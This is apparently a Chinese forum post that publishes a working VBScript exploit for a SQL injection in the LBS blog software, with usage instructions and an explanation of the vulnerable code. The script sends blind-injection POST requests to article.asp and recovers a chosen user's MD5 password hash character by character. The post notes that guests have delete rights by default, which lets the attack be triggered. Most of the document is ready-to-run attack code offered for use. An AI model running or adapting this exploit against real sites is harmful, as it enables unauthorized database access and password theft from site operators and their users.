呵呵,只是證明下漏洞存在
exp如下,保存為vbs,自己下個程序測試自己吧
'From 劍心
'============================================================================
'使用說明:
' 在命令提示符下:
' cscript.exe lbsblog.vbs 要攻擊的網站的博客路徑 有效的文章id 要破解的博客用戶密碼
'如:
' cscript.exe lbsblog.vbs www.xxxx.com/blog/ 1 1
' by loveshell
'============================================================================
On Error Resume Next
Dim oArgs
Dim olbsXML 'XMLHTTP對象用來打開目標網址
Dim TargetURL '目標網址
Dim userid,articleid '博客用戶名
Dim TempStr '存放已獲取的部分 MD5密碼
Dim CharHex '定義16進制字符
Dim charset
Set oArgs = WScript.arguments
If oArgs.count < 1 Then Call ShowUsage()
Set olbsXML = createObject("Microsoft.XMLHTTP")
'補充完整目標網址
TargetURL = oArgs(0)
If LCase(Left(TargetURL,7)) <> "http://" Then TargetURL = "http://" & TargetURL
If right(TargetURL,1) <> "/" Then TargetURL = TargetURL & "/"
TargetURL=TargetURL & "article.asp"
articleid=oArgs(1)
userid=oArgs(2)
TempStr=""
CharHex=Split("0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f",",")
WScript.echo "LBS blog All version Exploit"&vbcrlf
WScript.echo "By 劍心"&vbcrlf
WScript.echo "http://www.loveshell.net/ Just For fun :)"&vbcrlf&vbcrlf
WScript.echo "+Fuck the site now"&vbcrlf
Call main(TargetURL,BlogName)
Set oBokeXML = Nothing
'----------------------------------------------sub-------------------------------------------------------
'============================================
'函數名稱:main
'函數功能:主程序,注入獲得blog 用戶密碼
'============================================
Sub main(TargetURL,BlogName)
Dim MainOffset,SubOffset,TempLen,OpenURL,GetPage
For MainOffset = 1 To 40
For SubOffset = 0 To 15
TempLen = 0
postdata = ""
postdata = articleid &" and (select left(user_password,"&MainOffset&") from blog_user where user_id=" & userid & ")='" & TempStr&CharHex(SubOffset) &"'"
OpenURL = TargetURL
olbsXML.open "Post",OpenURL, False, "", ""
olbsXML.setRequestHeader "Content-Type","application/x-www-form-urlencoded"
olbsXML.send "act=delete&id="& escape(postdata)
GetPage = BytesToBstr(olbsXML.ResponseBody)
'判斷訪問的頁面是否存在
If InStr(GetPage,"deleted")<>0 Then
'"博客用戶不存在或填寫的資料有誤" 為錯誤標志 ,返回此標志說明 猜解的 MD5 不正確
'如果得到 0000000000000000 的 MD5 值,請修改錯誤標志
ElseIf InStr(GetPage,"permission")<>0 Then
TempStr=TempStr & CharHex(SubOffset)
WScript.Echo "+Crack now:"&TempStr
Exit for
Else
WScript.echo vbcrlf & "Something error" & vbcrlf
WScript.echo vbcrlf & GetPage& vbcrlf
WScript.Quit
End If
next
Next
WScript.Echo vbcrlf& "+We Got It:" & TempStr & vbcrlf &vbcrlf&":P Don't Be evil"
End sub
'============================================
'函數名稱:BytesToBstr
'函數功能:將XMLHTTP對象中的內容轉化為GB2312編碼
'============================================
Function BytesToBstr(body)
dim objstream
set objstream = createObject("ADODB.Stream")
objstream.Type = 1
objstream.Mode =3
objstream.Open
objstream.Write body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = "GB2312"
BytesToBstr = objstream.ReadText
objstream.Close
set objstream = nothing
End Function
'============================
'函數名稱:ShowUsage
'函數功能:使用方法提示
'============================
Sub ShowUsage()
WScript.echo " LBS blog Exploit" & vbcrlf & " By Loveshell/劍心"
WScript.echo "Usage:"& vbcrlf & " CScript " & WScript.ScriptFullName &" TargetURL BlogName"
WScript.echo "Example:"& vbcrlf & " CScript " & WScript.ScriptFullName &" http://www.loveshell.net/ 1 1"
WScript.echo ""
WScript.Quit
End Sub
漏洞說明:
src_article.asp中的
......
input["log_id"]=func.checkInt(input["log_id"]);
if(!input["id"]){
strError=lang["invalid_parameter"];
}else{
// Check if the article exists
theArticle.load("log_id, log_authorID, log_catID","log_id="+input["id"]);
strError=false;
}
......
過濾的是log_id,但是使用的確實id,呵呵 :)
然后呢?
class/article.asp中的代碼
this.load = function(strselect, strwhere){
var tmpA=connBlog.query("select TOP 1 "+strselect+" FROM [blog_Article] where "+strwhere);
if(tmpA){
this.fill(tmpA[0]);
return true;
}else{
return false;
}
}
上面不用說了吧,呵呵.不過觸發要條件的,看能滿足不哦!
function articledelete(){
if(theUser.rights["delete"]<1){
// Check User Right - without DB Query
pageHeader(lang["error"]);
redirectMessage(lang["error"], lang["no_rights"], lang["goback"], "javascript:window.history.back();", false, "errorbox");
}else{
var theArticle=new lbsArticle();
var strError;
默認情況下guest都有刪除權限的,盡管后面還做了判斷,但是注入已經發生,而我們正好利用他的判斷注射,呵呵
